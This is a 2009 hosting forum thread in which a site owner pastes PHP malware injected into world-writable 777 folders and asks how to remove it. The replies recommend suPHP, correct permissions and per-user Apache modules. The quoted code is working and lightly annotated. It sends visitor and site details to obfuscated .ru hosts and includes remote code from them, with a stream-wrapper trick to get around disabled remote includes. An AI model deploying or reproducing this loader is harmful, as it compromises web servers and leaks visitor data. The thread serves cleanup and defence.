-
07-24-2009, 05:37 AM #1Web Hosting Master
777 folders are got affected by the following code
777 folders got affected by the following code
PHP Code:class newhttp{
// [analysis] Injected PHP sample quoted by the poster. Do not execute it: the script at the
// bottom include()s whatever a remote host returns, so the operator of that host decides what
// runs inside the web server process.
// This class is a userland stream wrapper (stream_open/stream_read/... callbacks) that speaks
// HTTP/1.0 over a raw fsockopen() socket. It is registered further down under the scheme
// "http2" and is only used on the fallback path, when the allow_url_* ini checks fail.
// For cleanup, the class name "newhttp" and the base64 literals below are fixed strings that
// can be searched for across the account's PHP files.
//
// Wrapper state: $mode starts at 4 and stream_open() adds 2 for non-read modes; $stat is the
// array handed back by stream_stat().
var $fullurl; var $p_url; var $conn_id; var $flushed; var $mode = 4; var $defmode; var $redirects = 0; var $binary; var $options; var $stat = array('dev' => 0,'ino' => 0,'mode' => 0,'nlink' => 1,'uid' => 0,'gid' => 0,'rdev' => -1,'size' => 0,'atime' => 0,'mtime' => 0,'ctime' => 0,'blksize' => -1,'blocks' => 0);
// Raises $msg as E_USER_WARNING only when STREAM_REPORT_ERRORS is set in the open options;
// always returns false.
function error($msg='not connected') { if ($this->options & STREAM_REPORT_ERRORS) { trigger_error($msg, E_USER_WARNING); } return false; }
// Parses the URL, connects with fsockopen() (port 80 unless the URL names one, 2-second
// timeout) and fills in default 'http' context options (method GET, empty header/content,
// the ini user_agent, max_redirects 5). No request is sent at this point.
function stream_open($path, $mode, $options, $opened_path) { $this->fullurl = $path; $this->options = $options; $this->defmode = $mode; $url = parse_url($path); if (empty($url['host'])) { return $this->error('missing host name'); } $this->conn_id = fsockopen($url['host'], (empty($url['port']) ? 80 : intval($url['port'])), $errno, $errstr, 2); if (!$this->conn_id) { return false; } if (empty($url['path'])) { $url['path'] = '/'; } $this->p_url = $url; $this->flushed = false; if ($mode[0] != 'r' || (strpos($mode, '+') !== false)) { $this->mode += 2; } $this->binary = (strpos($mode, 'b') !== false); $c = $this->context(); if (!isset($c['method'])) { stream_context_set_option($this->context, 'http', 'method', 'GET'); } if (!isset($c['header'])) { stream_context_set_option($this->context, 'http', 'header', ''); } if (!isset($c['user_agent'])) { stream_context_set_option($this->context, 'http', 'user_agent', ini_get('user_agent')); } if (!isset($c['content'])) { stream_context_set_option($this->context, 'http', 'content', ''); } if (!isset($c['max_redirects'])) { stream_context_set_option($this->context, 'http', 'max_redirects', 5); } return true; }
// Closes the socket if one is open.
function stream_close() { if ($this->conn_id) { fclose($this->conn_id); $this->conn_id = null; } }
// Sends the request on the first read (through stream_flush), then returns up to $bytes from
// the socket: fread() in binary mode, fgets() otherwise.
function stream_read($bytes) { if (!$this->conn_id) { return $this->error(); } if (!$this->flushed && !$this->stream_flush()) { return false; } if (feof($this->conn_id)) { return ''; } $bytes = max(1,$bytes); if ($this->binary) { return fread($this->conn_id, $bytes); } else { return fgets($this->conn_id, $bytes); } }
// Appends $data to the context's 'content' option and switches the method to POST (PUT when
// the open mode starts with 'x'); nothing is written to the socket here.
// NOTE(review): '!$this->mode & 2' parses as '(!$this->mode) & 2', which is always 0, so the
// read-only branch is never taken.
function stream_write($data) { if (!$this->conn_id) { return $this->error(); } if (!$this->mode & 2) { return $this->error('Stream is in read-only mode'); } $c = $this->context(); stream_context_set_option($this->context, 'http', 'method', (($this->defmode[0] == 'x') ? 'PUT' : 'POST')); if (stream_context_set_option($this->context, 'http', 'content', $c['content'].$data)) { return strlen($data); } return 0; }
// EOF is reported when there is no connection, or once the request has been sent and the
// socket itself is at EOF.
function stream_eof() { if (!$this->conn_id) { return true; } if (!$this->flushed) { return false; } return feof($this->conn_id); }
// Seeking is not supported and the position is always reported as 0.
function stream_seek($offset, $whence) { return false; }
function stream_tell() { return 0; }
// Sends the request once and consumes the response headers.
// Request: "<method> <path>[?query] HTTP/1.0" with "HOST:", "User-Agent: <ua> StreamReader",
// the optional extra header, Content-Type/Content-Length when there is a body, and
// "Connection: close".
// Response: the status line goes into the global $http_response_header; 301-303 and 307 are
// followed through the Location header by re-opening the stream, up to max_redirects;
// Content-Length, Date and Last-Modified are copied into $stat; a status >= 400 or 304
// returns false.
// Detection hint: the " StreamReader" User-Agent suffix and the upper-case "HOST:" header
// name are fixed strings in this sample and may be visible in outbound proxy or packet logs.
// NOTE(review): when a redirect carries no Location header, $new_location is used without
// ever being assigned.
function stream_flush() { if ($this->flushed) { return false; } if (!$this->conn_id) { return $this->error(); } $c = $this->context(); $this->flushed = true; $RequestHeaders = array($c['method'].' '.$this->p_url['path'].(empty($this->p_url['query']) ? '' : '?'.$this->p_url['query']).' HTTP/1.0', 'HOST: '.$this->p_url['host'], 'User-Agent: '.$c['user_agent'].' StreamReader' ); if (!empty($c['header'])) { $RequestHeaders[] = $c['header']; } if (!empty($c['content'])) { if ($c['method'] == 'PUT') { $RequestHeaders[] = 'Content-Type: '.($this->binary ? 'application/octet-stream' : 'text/plain'); } else { $RequestHeaders[] = 'Content-Type: application/x-www-form-urlencoded'; } $RequestHeaders[] = 'Content-Length: '.strlen($c['content']); } $RequestHeaders[] = 'Connection: close'; if (fwrite($this->conn_id, implode("\r\n", $RequestHeaders)."\r\n\r\n") === false) { return false; } if (!empty($c['content']) && fwrite($this->conn_id, $c['content']) === false) { return false; } global $http_response_header; $http_response_header = fgets($this->conn_id, 300); $data = rtrim($http_response_header); preg_match('#.* ([0-9]+) (.*)#i', $data, $head); if (($head[1] >= 301 && $head[1] <= 303) || $head[1] == 307) { $data = rtrim(fgets($this->conn_id, 300)); while (!empty($data)) { if (strpos($data, 'Location: ') !== false) { $new_location = trim(str_replace('Location: ', '', $data)); break; } $data = rtrim(fgets($this->conn_id, 300)); } trigger_error($this->fullurl.' 
'.$head[2].': '.$new_location, E_USER_NOTICE); $this->stream_close(); return ($c['max_redirects'] > $this->redirects++ && $this->stream_open($new_location, $this->defmode, $this->options, null) && $this->stream_flush()); } $data = rtrim(fgets($this->conn_id, 1024)); while (!empty($data)) { $http_response_header .= $data."\r\n"; if (strpos($data,'Content-Length: ') !== false) { $this->stat['size'] = trim(str_replace('Content-Length: ', '', $data)); } elseif (strpos($data,'Date: ') !== false) { $this->stat['atime'] = strtotime(str_replace('Date: ', '', $data)); } elseif (strpos($data,'Last-Modified: ') !== false) { $this->stat['mtime'] = strtotime(str_replace('Last-Modified: ', '', $data)); } $data = rtrim(fgets($this->conn_id, 1024)); } if ($head[1] >= 400) { trigger_error($this->fullurl.' '.$head[2], E_USER_WARNING); return false; } if ($head[1] == 304) { trigger_error($this->fullurl.' '.$head[2], E_USER_NOTICE); return false; } return true; }
// Forces the request to be sent, then returns $stat.
function stream_stat() { $this->stream_flush(); return $this->stat; }
// Directory and url_stat callbacks are stubs.
function dir_opendir($path, $options) { return false; }
function dir_readdir() { return ''; }
function dir_rewinddir() { return ''; }
function dir_closedir() { return; }
function url_stat($path, $flags) { return array(); }
// Lazily creates a stream context and returns its 'http' option array (an empty array when
// none is set).
function context() { if (!$this->context) { $this->context = stream_context_create(); } $c = stream_context_get_options($this->context); return (isset($c['http']) ? $c['http'] : array()); }
// End of the wrapper class; the injected top-level script starts on the same line as the
// closing brace. $a..$h collect request details from $_SERVER, falling back to the old
// register_globals-style variables ($HTTP_HOST, ...).
}$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);
$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);
$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);
$d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);
$e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);
$f=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);
$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);
$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);
// $str = the eight values above, each base64-encoded and joined with '.', followed by $s.
// It becomes the query string of the remote URL, so the site's host name, the requested URI,
// the referrer, the visitor's user agent and the visitor's IP are disclosed to the remote
// server on every request that reaches this code.
// $s (and $p below) are not defined in this excerpt; presumably they are set in a part of
// the injection that the poster did not quote.
$str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".$s";$rkht=1;
// $rkht ends up 1 only if allow_url_fopen is on and, on PHP >= 5.2, allow_url_include is on
// as well.
if(version_compare(PHP_VERSION,'5.2','>=')){if(ini_get('allow_url_include')){$rkht=1;}else{$rkht=0;}}
if($rkht==1){if(ini_get('allow_url_fopen')){$rkht=1;}else{$rkht=0;}}
// Path A (remote includes allowed): include() straight over HTTP.
// Decoded literals (dots defanged in this comment): "aHR0cDovLw==" = "http://",
// "LnVzZXJzLnBocGZyZWUucnU=" = ".users.phpfree[.]ru",
// "LnVzZXJzLnBocGNvZGluZy5ydQ==" = ".users.phpcoding[.]ru".
// URL shape: http://<$p>.users.phpfree[.]ru/?<$str>.0 ; if that include returns a falsy
// value, the second domain is tried with the suffix ".1".
if($rkht==1){if ((include(base64_decode("aHR0cDovLw==").$p.base64_decode("LnVzZXJzLnBocGZyZWUucnU=").'/?'.$str.'.0'))){}
else {include(base64_decode("aHR0cDovLw==").$p.base64_decode("LnVzZXJzLnBocGNvZGluZy5ydQ==").'/?'.$str.'.1');}
}
// Path B (remote includes disabled): the class above is registered as scheme "http2"
// ("aHR0cDI6Ly8=" = "http2://") and the include goes through it, same two hosts, suffixes
// ".2" and ".3".
// stream_wrapper_register() is called without a flags argument. NOTE(review): per the PHP
// manual the default flags value marks the wrapper as a local stream, which is presumably why
// this path is not stopped by allow_url_include=Off; confirm on the affected PHP version.
// Hardening to evaluate: keep untrusted code from being written at all (no world-writable
// directories, per-user PHP execution), deny outbound HTTP from the web server where sites do
// not need it, and consider listing stream_wrapper_register in disable_functions if no hosted
// application depends on it.
else{stream_wrapper_register('http2','newhttp');
if ((include(base64_decode("aHR0cDI6Ly8=").$p.base64_decode("LnVzZXJzLnBocGZyZWUucnU=").'/?'.$str.'.2'))){}
else {include(base64_decode("aHR0cDI6Ly8=").$p.base64_decode("LnVzZXJzLnBocGNvZGluZy5ydQ==").'/?'.$str.'.3');}
}
Now, how should I remove that, and how do I make the 777 folders safe?
I am able to change the folders to 755, but some things do not work with 755.
Please advise me.
-
07-24-2009, 05:57 AM #2Web Hosting Master
-
07-24-2009, 06:03 AM #3Web Hosting Master
Using suPHP?
But if I activate suPHP, some folders may show an internal server error.
-
07-24-2009, 06:55 AM #4Web Hosting Master
Hi yajur,
Compiling PHP as suPHP will prevent this type of activity.
" but if i activate suphp then some folder may show internal server error "
Yes, suPHP will give an internal server error if any of the folders or files have 777 permissions. The same thing happens if you are declaring PHP variables using .htaccess. For that you need to create a custom php.ini.
-
07-24-2009, 06:56 AM #5Total Nerd
Why are so many people putting unsecured servers into production?
-
07-24-2009, 07:00 AM #6Junior Guru
-
07-24-2009, 07:32 AM #7Web Hosting Master
-
07-24-2009, 08:05 AM #8Eternal Learner
777 is the worst thing to do. It will expose your scripts to attacks, because a world-writable folder can be written to by any other account or process on the server.
Prashant T.
-
07-24-2009, 09:13 AM #9Junior Guru Wannabe
-
07-24-2009, 10:57 AM #10Randy
as others stated, suphp and correct permissions are your answer. If you use Cpanel, here's a couple hints I documented:
Part 1 - permissions:
http://djlab.com/2009/06/cpanel-suph...l-folders-755/
Part 2 - ownership:
http://djlab.com/2009/06/cpanel-suph...ership-issues/
-
07-24-2009, 12:00 PM #11Web Hosting Master
-
07-24-2009, 12:02 PM #12Randy
Check ownership (part 2). All files/folders must be owned by the site owner, and NOT apache, root, etc.
-
07-24-2009, 12:04 PM #13Web Hosting Master
Blah...
suphp is an option... not a very good one as it will help with your problem while causing completely different problems.
mpm_peruser or mpm_itk will help with your problem without causing the problems suphp will.
-
07-24-2009, 03:23 PM #14Randy
The issues people have with suphp are problems that already exist prior to installing it. Insecure permissions..plain and simple. Suphp is protecting you from your own mistakes by giving 500 errors.
If you utilize chmod/chown scripts after installing suphp on an existing server that was running mod_php, or just install it on a clean server, you won't have these issues.
Changing to a different MPM is not a solution I'd recommend to others. mpm_prefork is all I would trust in a busy environment.
-
07-24-2009, 10:18 PM #15Web Hosting Guru